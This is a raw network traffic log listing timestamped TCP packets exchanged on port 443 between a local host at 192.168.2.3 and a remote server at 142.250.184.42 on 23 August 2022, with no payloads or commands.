Aug 23, 2022 03:43:41.918989897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.919012070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.919034958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.919334888 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.919524908 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.919771910 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.920128107 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.920584917 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.920766115 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.920876980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.920943975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.920968056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.920984030 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.921020985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921065092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921103954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921128988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921154022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921179056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921201944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921225071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921251059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921274900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921295881 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921319008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921340942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921365976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921387911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921411037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921433926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921454906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921477079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921500921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921506882 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.921525002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921550035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921574116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921597004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921618938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921658993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921700954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921722889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921746016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921751022 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.921770096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921792984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921813965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921854019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.921966076 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.922003984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922029018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922050953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922074080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922096968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922122002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922146082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922168970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922192097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922216892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922240019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922261953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922283888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922307968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922333002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922354937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922378063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922816038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922846079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922868013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.922966003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923181057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923270941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923388958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923517942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923602104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923628092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923650980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923674107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923696995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923718929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923742056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923763990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923783064 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.923788071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923814058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923836946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923861980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923887014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923909903 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923932076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923954010 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.923975945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924000025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924001932 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.924024105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924047947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924071074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924094915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924123049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924146891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924171925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924196005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924228907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924252033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924251080 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.924277067 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924299955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924324036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924348116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924371004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924387932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924407005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924426079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924448013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924472094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924489021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924508095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924531937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924555063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924577951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924601078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924626112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924649954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924671888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924694061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924717903 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924740076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924760103 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.924762964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924787998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924813032 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924838066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924860001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924931049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924956083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.924979925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925003052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925028086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925049067 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925071955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925138950 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.925209999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925240040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925263882 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925287008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925311089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925335884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925359011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925381899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925384998 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.925406933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925431013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925453901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925477028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925501108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925523043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925545931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925570011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925595045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925621986 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.925631046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925657034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925679922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925703049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925725937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925748110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925770998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925793886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925816059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925841093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925862074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925884008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925905943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925928116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925950050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925971985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.925993919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926017046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926038027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926059961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926081896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926104069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926107883 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.926129103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926151991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926173925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926197052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926218033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.926290035 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.926486015 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.926970005 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.927160978 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.927347898 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.927692890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.927716017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.927788973 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.927963972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.927984953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928006887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928025007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928045034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928062916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928081989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928260088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928280115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928292990 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.928297043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928316116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928333044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928352118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928369999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928406000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928422928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928442001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928458929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928478003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928482056 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.928495884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928514004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928530931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928567886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928586006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928606033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928621054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928638935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928659916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928678036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928694963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928776979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928796053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928813934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928813934 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.928832054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928895950 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928915024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928932905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928947926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.928965092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.929008961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.929025888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.929059982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.929210901 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.929676056 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.933948040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.933970928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.933989048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934010029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934027910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934046984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934066057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934084892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934099913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934118986 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934137106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934155941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934174061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934214115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934231043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934283018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934465885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934484959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934499979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934516907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934534073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934551954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934571028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934588909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934606075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934662104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934698105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934706926 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.934741974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934761047 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934864998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934884071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934900045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934942007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934959888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934962988 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.934978008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.934995890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935014963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935237885 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.935643911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935744047 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935761929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935816050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935861111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935897112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935935974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935954094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935969114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.935977936 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.936011076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936047077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936104059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936142921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936219931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936297894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936296940 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.936378002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936424971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936443090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936461926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936568022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936697960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936716080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936733007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936752081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936769962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936822891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936858892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.936997890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937011003 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.937040091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937069893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937093973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937120914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937144041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937169075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937199116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937225103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937251091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937304020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937309980 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.937330961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937350988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937408924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937453032 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937478065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937504053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937530041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.937556028 CEST	443	64969	142.250.184.42	192.168.2.3
